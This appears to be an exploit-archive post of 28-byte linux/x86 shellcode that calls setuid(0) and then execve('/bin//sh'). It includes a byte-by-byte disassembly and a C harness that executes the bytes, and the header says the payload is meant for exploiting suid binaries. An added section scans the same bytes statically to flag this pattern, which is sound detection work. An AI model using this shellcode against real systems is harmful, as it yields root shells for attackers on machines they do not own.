linux/x86 setuid(0) + execve(/bin/sh) 28 bytes

Author: Revenge
Risk: Security Risk Unsorted
0day-ID: 0day-ID-7183
Category: shellcode
Date add: 16-11-2006
Platform: linux/x86

/*
 * revenge-setuid.c, v1.0 2006/09/30 14:57
 *
 * linux/x86 setuid(0) + execve("/bin//sh", ["/bin//sh"], NULL) shellcode
 * once again...
 *
 * [    setuid (6 bytes) + execve (22 bytes)  = 28 bytes       ]
 * [                                                           ]
 * [    Same as revenge-execve.c we start the 2 system         ]
 * [    calls with a mov resulting in 2 bytes less, but        ]
 * [    this one is only for suid binary exploitation.         ]
 * [                                                           ]
 *
 * http://www.0xcafebabe.it
 * <revenge@0xcafebabe.it>
 *
 */

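#include <stdio.h>
#include <string.h>

/*
 * Both syscall numbers are loaded with a one-byte "mov $imm8,%al", so the
 * upper 24 bits of %eax must already be zero: on entry for setuid, and as
 * setuid's return value (0 on success) for execve.
 */
char sc[] =
                                     // <_start>
       "\xb0\x17"                    // mov    $0x17,%al      (23 = setuid)
       "\x31\xdb"                    // xor    %ebx,%ebx      (uid 0)
       "\xcd\x80"                    // int    $0x80
       "\xb0\x0b"                    // mov    $0xb,%al       (11 = execve)
       "\x99"                        // cltd                  (%edx = 0, envp NULL)
       "\x52"                        // push   %edx           (string terminator)
       "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f    ("//sh")
       "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f    ("/bin")
       "\x89\xe3"                    // mov    %esp,%ebx      (path "/bin//sh")
       "\x52"                        // push   %edx           (argv[1] = NULL)
       "\x53"                        // push   %ebx           (argv[0] = path)
       "\x89\xe1"                    // mov    %esp,%ecx      (argv)
       "\xcd\x80"                    // int    $0x80
;

int main(void)
{
       void    (*fp)(void) = (void (*)(void))sc;

       /* strlen() returns size_t, so print it with %zu */
       printf("Length: %zu\n", strlen(sc));
       fp();
       return 0;
}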
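
For triage of captured buffers, the following added example (not part of the original post) statically recovers the two syscall numbers and the pushed path string from the bytes listed above without executing them. The function names, `page_bytes` and the `WINDOW` distance are assumptions made for this sketch.

```c
#include <stddef.h>
#include <string.h>
/* Added example. Constructed input: the 28 bytes listed above, held as inert data. */
static const unsigned char page_bytes[] =
    "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
#define WINDOW 24 /* assumed max gap between the %al load and int $0x80 */

/* Syscall numbers loaded by "mov $imm8,%al" (b0 ib) and followed by
 * "int $0x80" (cd 80) within WINDOW bytes. Byte heuristic, not a disassembler. */
size_t find_syscalls(const unsigned char *b, size_t n, unsigned char *out, size_t cap)
{
    size_t found = 0;
    for (size_t i = 0; i + 1 < n && found < cap; i++) {
        if (b[i] != 0xb0) continue;
        for (size_t j = i + 2; j + 1 < n && j <= i + WINDOW; j++) {
            if (b[j] == 0xb0) break;            /* %al reloaded first */
            if (b[j] == 0xcd && b[j + 1] == 0x80) {
                out[found++] = b[i + 1];
                i = j + 1;
                break;
            }
        }
    }
    return found;
}

/* String built by the first run of "push $imm32" (68 id). The last push sits
 * at the lowest address, so the immediates are copied in reverse order. */
size_t pushed_string(const unsigned char *b, size_t n, char *out, size_t cap)
{
    size_t i = 0, start, count = 0, len = 0;
    while (i + 5 <= n && b[i] != 0x68) i++;
    for (start = i; i + 5 <= n && b[i] == 0x68; i += 5) count++;
    while (count > 0 && len + 5 <= cap) {
        memcpy(out + len, b + start + 5 * --count + 1, 4);
        len += 4;
    }
    if (cap) out[len] = '\0';
    return len;
}

/* 1 when the first two syscalls are setuid (0x17) then execve (0x0b) of a shell path. */
int is_setuid_shell(const unsigned char *b, size_t n)
{
    unsigned char nr[8];
    char path[32];
    size_t k = find_syscalls(b, n, nr, sizeof nr);
    pushed_string(b, n, path, sizeof path);
    return k >= 2 && nr[0] == 0x17 && nr[1] == 0x0b && strstr(path, "/sh") != NULL;
}
```

A fixed byte pattern like this only matches unencoded variants, so treat a miss as inconclusive.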


